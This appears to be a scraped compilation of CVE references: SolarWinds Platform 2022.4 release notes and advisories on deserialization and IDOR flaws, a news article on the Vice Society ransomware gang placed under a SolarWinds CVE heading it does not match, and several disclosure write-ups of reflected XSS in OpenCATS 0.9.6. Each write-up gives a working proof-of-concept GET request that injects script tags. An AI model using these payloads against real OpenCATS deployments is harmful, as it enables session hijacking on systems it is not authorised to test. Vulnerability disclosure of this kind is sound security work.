SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

CVE-2022-36957: Published | Zero Day Initiative

CVE-2022-38108: Published | Zero Day Initiative

Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.

**SolarWinds Platform RC documentation** - The following content is a draft for a **SolarWinds Platform Release Candidate**. All content subject to change. Some links might not function yet.

RC date: October 19, 2022

These release notes describe the new features, improvements, and fixed issues in SolarWinds Platform 2022.4. They also provide information about upgrades and describe workarounds for known issues.

Learn more

*   For information on latest hotfixes, see SolarWinds Platform Hotfixes.
*   For release notes for previous SolarWinds Platform versions, see Previous Version documentation.
*   For information about requirements, see SolarWinds Platform 2022.4 System Requirements.
*   For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

Return to top

SolarWinds Platform 2022.4 offers the following improvements compared to previous releases of SolarWinds Platform.

*   SolarWinds Platform 2022.4 provides SWIS Verbs for managing common credentials, such as Orion.Credential.CreateCredentials & Orion.Credential.UpdateCredentials for creating/editing the credentials.
    
*   SolarWinds Platform 2022.4 supports the Kerberos protocol for WMI authentication.
    

**New customer installation**

Return to top

For information about installing SolarWinds Platform, see SolarWinds Installer.

**How to upgrade**

Use the SolarWinds Installer to upgrade your entire SolarWinds Platform deployment (all SolarWinds Platform products and any scalability engines) to the current versions.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2022.4. If you are on Orion Platform 2019.4 or earlier, first upgrade to 2020.2.6 and then upgrade to SolarWinds Platform 2022.4.

**Before you upgrade from 2020.2.x**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   Legacy syslog and traps functionality has been retired and replaced with new log analysis functionality. Currently configured legacy rules and history will automatically be migrated during the upgrade.
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2019.4 or earlier.

**Fixed issues**

Return to top

SolarWinds Platform 2022.3 fixes the following issues.

 

Case Number

Description

614891, 787724, 980418, 986820

The issue where last month data was not interpreted correctly in PerfStack was addressed.

614233, 762559, 804478, 837222, 899624, 920603, 933885, 942223, 1059644, 1169810, 1171661, 1179118

The issue where report schedules with SAML accounts could not be created was addressed.

683517, 875616

The issue where Centralized Upgrade did not work with a proxy was resolved.

1067814, 1151313

The issue where the child status participation in node status was incorrect in fast polls was addressed.

936171, 946582, 1067460, 1131341

The issues with bulk assigning values on filtered rows were addressed.

802569

The issue where JobEngine Workers started slowly on computers without Internet access was addressed.

1144845, 1161775

The issue where configuration failed when installation location changed was addressed.

233154, 319006, 328477, 458287, 688246

The issues with CredentialManagerService slow methods were addressed.

778743

The issue where a Nexus switch was incorrectly recognized as Cisco was addressed.

973342, 977343

The issue where machine types for Cisco devices were only recognized as Cisco was addressed.

1102730

The issue where child status was not updated properly was addressed.

949509

The issue where collector log was flooded when processing Agent Node uptime was addressed.

761222

The unhandled exception in the Poller Checker tool was addressed.

1187140

The issue where the HA service stopped after the upgrade was addressed.

1187140

The issue where Observability templates were not delivered to the system was addressed.

636868

The issue where database maintenance failed to execute a procedure were addressed.

1144505

The issue where database maintenance job completed with errors caused by calling a legacy procedure was addressed.

928393

The issues with OIDs for Antaira Technologies, LLC and corresponding icons were addressed.

554483, 692820

The issue where main poller was used on bulk actions from Node Management for sending any requests to nodes was addressed.

893718

The issue where capacity forecast for CPU/memory was not calculated was addressed.

1184046

The issue where scalability engines installation failed because of a free tool installed in the SolarWinds folder was addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-36966

Insecure Direct Object Reference Vulnerability

Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.

5.9 Medium

Asim Liaquat

CVE-2022-36957

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

7.2 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-36958

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-38108

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

7.2 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

**End of life**

Return to top

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds is announcing future end-of-life plans for your convenience. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on NSolarWinds Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**End of support**

Return to top

This version of SolarWinds Platform no longer supports the following platforms and features.

 

Type

Details

Microsoft Windows Server 2012 R2

Windows Server 2012 R2 is not supported in SolarWinds Platform 2022.4.

SolarWinds recommends that you upgrade the operating system of your SolarWinds Platform server to Windows Server 2016 or later. See SolarWinds Platform 2022.4 System Requirements.

**Legal notices**

Return to top

© 2022 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-36966: SolarWinds Platform 2022.4  Release Notes

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands.

**Security Advisory Summary**

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands.

**Affected Products**

*   SolarWinds Platform 2022.3 and earlier
*   Orion Platform 2020.2.6 HF5 and earlier

**Fixed Software Release**

*   SolarWinds Platform 2022.4 RC1

**Acknowledgments**

*   Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-36958: SolarWinds Trust Center Security Advisories | CVE-2022-36958

Vice Society has a superpower that’s allowed it to quietly carry out attacks on schools and hospitals around the world: mediocrity.

a ransomware attack on the Los Angeles Unified School District in the first week of September crippled digital operations across the system, which includes more than 1,000 schools and serves roughly 600,000 students. Two weeks after the initial attack, as the district worked to recover and restore its systems, the hackers said that they would leak the 500 gigabytes of data they claimed to have stolen from LAUSD if the school system didn't pay a ransom. 

After the school system refused to pony up, the hackers released the trove, which contained sensitive data of students who had attended LAUSD between 2013 and 2016, including their Social Security numbers, financial and tax information, health details, and even legal records. And as LAUSD set up a hotline for worried families and scrambled to deal with the fallout, the hacking group behind the attack moved on, seemingly without making any money off the incident. 

That's Vice Society for you.

The apparently Russian-speaking group is a prolific ransomware actor that has hit an array of educational institutions since emerging at the end of 2020. But in addition to focusing on schools, Vice Society is notorious for targeting health care facilities and hospitals—a sector long-plagued by ransomware attacks, but one that some hacking groups pledged not to target at the height of the Covid-19 pandemic. Amidst a nonetheless brutal wave of North American hospital ransomware attacks in 2020, though, Vice Society's activity has been just unremarkable enough to keep the group out of the spotlight.

“We would probably think of them as a second- or maybe third-tier group overall, compared to big names like LockBit, Hive, and Black Cat,” says Allan Liska, an analyst for the security firm Recorded Future who specializes in ransomware. “But the bulk of their victims are either in the education or health care sectors, and their attacks make up a significant chunk of the total known attacks in those categories for 2021 and 2022 so far. They loom large in those two sectors.”

Vice Society is, in many ways, an unremarkable ransomware gang. The group relies on exploiting known vulnerabilities like PrintNightmare to gain access to victims' systems and may sometimes buy a foot in the door from criminal actors known as “initial access" brokers. Once inside a network, Vice Society uses automated scripts and takes advantage of an organization's own network management tools to conduct standard reconnaissance and exfiltrate data. Then the group deploys prepackaged ransomware. 

Shortly after the LAUSD attack, the United States Cybersecurity and Infrastructure Security Agency and the FBI published an alert about Vice Society, noting that the group is “disproportionately targeting the education sector with ransomware attacks.” The agencies added that “Vice Society is an intrusion, exfiltration, and extortion hacking group … \[The\] actors do not use a ransomware variant of unique origin."

In addition to its technically unremarkable attacks, Vice Society has also hit targets around the world, spreading its victimes between North America, South America, and Europe. 

Throughout 2021, Vice Society's health care targets included Barlow Respiratory Hospital in California, Eskenazi Health in Indiana, Centre Hospitalier D'Arles in France, United Health Centers in California, and a dental company in Brazil. The group also attacked New Zealand's Waikato District Health Board that summer, which, among other impacts, resulted in the cancellation of two Air New Zealand flights; the airline couldn't obtain proof of negative Covid-19 tests for crew members because the health department's digital systems were down.

Vice Society also targeted schools and universities in 2021 and seems to have favored this sector more and more as the United States and other countries devote more resources to ransomware enforcement and hone mitigation techniques. In the wake of high-profile 2021 attacks, like the Colonial Pipeline ransomware incident, prominent Russian-speaking actors faced infrastructure takedowns, indictments, and even rare Russian arrests for their brazen crimes. 

Vice Society may view education as a quieter and less well funded category where it can fly under the radar. For example, the group hit the Austrian Medical University of Innsbruck in June and Linn-Mar Community School District in Iowa at the beginning of August—neither of which many people would flag as major, obvious targets. The Bluets maternity hospital in Paris accused the group last week of a ransomware attack on its systems. Vice Society has not taken credit so far for the hack.

“They’re a perfect example of the success of mediocrity in the ransomware ecosystem,” says Claire Tills, a researcher for the security firm Tenable who has studied Vice Society's tactics and organization. “You have the top-tier groups developing their own zero days and acting all polished and professional. But meanwhile, Vice Society is just chugging along, not really innovating, stealing tools from other folks, but they have just enough stability to launch attacks, get paid, keep moving."

Researchers view the group's attack on the Los Angeles Unified School District as significant because LAUSD is a major target, and it made more of a splash than most of Vice Society's other hacks. Tills notes that the group may not have understood the scale and prominence of the school district it was taking on or may have chosen the target deliberately as a test of whether it was ready to up its game and focus on larger victims. But the apparent failure to secure payment and scrutiny that came from the incident may have warned the group off of such visible attacks.

“They're focusing on not necessarily big targets. Not everyone is aware of how bad and how devastating these attacks are, because they are so regional and they don't necessarily break into the mainstream,” Recorded Future's Liska says. “You may not want to be Conti and take down a whole country’s health care system, because if you do, you’re going to draw the ire of these countries.”

By focusing on lesser-known schools, Tenable's Tills warns, Vice Society may be able to maintain its low profile and continue its streak if defenders and law enforcement don't make mid-tier ransomware groups a higher priority. 

“Vice Society has taken the approach of knowing that the education sector isn’t doing great emotionally or financially,” Tills says. "Schools are under so much pressure after being closed on and off for two years, and ransomware actors know that the more stressed people are, the more likely they are to make suboptimal decisions. The group's success makes them sustainable, but they're still kind of written off. So they're not getting raided or arrested that we’ve seen so far. They're a really good example of what we as an industry are not paying enough attention to.”

The Vice Society Ransomware Gang Thrives in a Crucial Blind Spot

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.

Permalink

**1** contributor

**Users who have contributed to this file**

**Cross Site Scripting vulnerability in the OpenCats 'email' parameter of Check Email functionality**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET /index.php?m=toolbar&callback=<script>alert`xss`</script>&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script>

CVE-2022-43018: opencats_zero-days/XSS_in_checkEmail.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.

Permalink

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

**1** contributor

**Users who have contributed to this file**

Cross Site Scripting vulnerability in the OpenCats 'indexFile'.

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET //ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert`xss`</script>&isPopup=0

CVE-2022-43017: opencats_zero-days/XSS_in_indexFile.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.

Permalink

**1** contributor

**Users who have contributed to this file**

**Cross Site Scripting vulnerability in the OpenCats 'joborderID'.**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a> <script>alert`xss`</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0

CVE-2022-43014: opencats_zero-days/XSS_in_joborderID.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter.

Permalink

Cannot retrieve contributors at this time

**Cross Site Scripting vulnerability in the OpenCats 'entriesPerPage'.**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)"></a> <script>alert`xss`</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0

CVE-2022-43015: opencats_zero-days/XSS_in_entriesPerPage.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component.

Permalink

Cannot retrieve contributors at this time

**Cross Site Scripting vulnerability in the OpenCats 'callback'.**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

GET /index.php?m=toolbar&callback=<script>alert`xss`</script>&a=authenticate

Tag

#zero_day